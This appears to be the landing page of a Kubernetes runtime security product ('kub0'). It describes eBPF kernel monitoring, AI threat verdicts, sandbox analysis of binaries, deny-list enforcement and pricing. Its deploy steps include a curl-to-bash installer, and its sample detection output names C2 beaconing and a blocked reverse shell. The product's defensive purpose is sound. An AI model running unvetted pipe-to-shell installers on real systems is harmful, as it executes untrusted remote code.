
kub0

Kernel-native runtime security for Kubernetes.

See every process, syscall, and connection at the Linux kernel—with AI verdicts from your own infrastructure. Catch threats in milliseconds, then turn on per-policy enforcement to block at the syscall, on your terms.

Why kub0

Not another SIEM.
Not another agent.

Kernel-level visibility
See what actually happened—not what an agent reported. No logs to tamper with, no userspace to bypass.
Verdicts, not just alerts
Every event gets a kernel-level verdict—not another ticket in the queue. Turn on per-policy enforcement to block at the syscall when you're ready.
Your cluster, your AI
Threat analysis runs on your infrastructure. Data never leaves the cluster. No cloud dependency.
Can't crash your nodes
No kernel module. Bounded eBPF programs fail open by design. System error? Traffic flows.
Product

Runtime security
from syscall to verdict

LIVE
Hunt
See every process, connection, and file operation across your cluster in real time. Malicious behavior is flagged at the kernel the moment it happens—with per-policy enforcement to block at the syscall when you choose.
ATT&CK tactics · detection rules
LIVE
Assay
Upload a suspicious binary. It runs in a traced sandbox, gets scanned for known signatures, and receives an AI behavioral verdict—all in seconds. Every scan grows a shared behavioral corpus that clusters similar variants automatically.
sandbox detonation · AI verdict · self-growing corpus
Intelligence
LIVE
Landscape
The cyber threat landscape on one map—APT activity, trending actors, KEV exploits, and campaign likelihood, focused by kill-chain stage.
threat map · KEV · ATT&CK
PRO
Feeds
CVE, KEV, and OTX threat-intel feeds correlated to your cluster—IOCs, adversary tracking, and the exploits that actually reach you.
CVE · KEV · OTX
PRO
Investigate
Investigate anything—CVE, actor, IOC, domain, or hash—and pivot across the linked graph: actor → sample → IOC → technique. Press ⌘K from any page.
cross-entity graph · ⌘K
Engine
LIVE
Vigiles AI
Security AI that runs on your infrastructure. Analyzes raw kernel events and returns confidence-scored threat verdicts. Your data never leaves the cluster.
on-prem inference · no cloud dependency
LIVE
API
REST + SSE for everything. Stream events in real-time, submit samples, query verdicts, manage the deny list.
REST · SSE · JSON
LIVE
Enforce
Managed deny list and path enforcement with block or monitor modes—per policy. Roll enforcement out node by node as your baseline proves clean.
deny list · path enforce · block/monitor
ALPHA
Posture
See which attack techniques you're covered for and where the gaps are. Live coverage scoring from your actual cluster state.
coverage map · gap analysis · enforcement readiness
Deploy

From kubectl apply to
kernel coverage in 2 minutes

01
Deploy Hunt policies
# Apply TracingPolicies + vigiles-probe sensor
kubectl apply -f https://kub0.ai/deploy/hunt.yaml

# Signup + deploy in one step
curl -sSL https://kub0.ai/install | bash

# API key only (no cluster install)
curl -sX POST https://kub0.ai/api/signup \
  -H "Content-Type: application/json" \
  -d '{"email":"you@example.com"}'
→ {"token":"kub0_...","credits":100}
02
Events stream in
# Behavioral events appear live
process_exec → /usr/bin/python3
network_connect → 185.220.101.x:443
03
Verdict & enforce
# Vigiles classifies in real time. Enforce per-policy.
VERDICT: C2_BEACONING conf=0.94 · <500ms · TA0011
ENFORCE: /bin/sh reverse shell blocked · per-policy · <1ms
Pricing

Detection is free.
Pay when you need intelligence.

Community
$0
No credit card. No time limit.
  • Detection + per-policy enforcement—up to 10 nodes
  • detection rules across ATT&CK tactics
  • Real-time event stream with threat mapping
  • 100 Assay sandbox credits
  • eBPF sensor included
  • Any Linux Kubernetes cluster
Get free API key →
Large deployment?
50+ nodes, private corpus, compliance requirements, or air-gapped clusters?
contact@kub0.ai →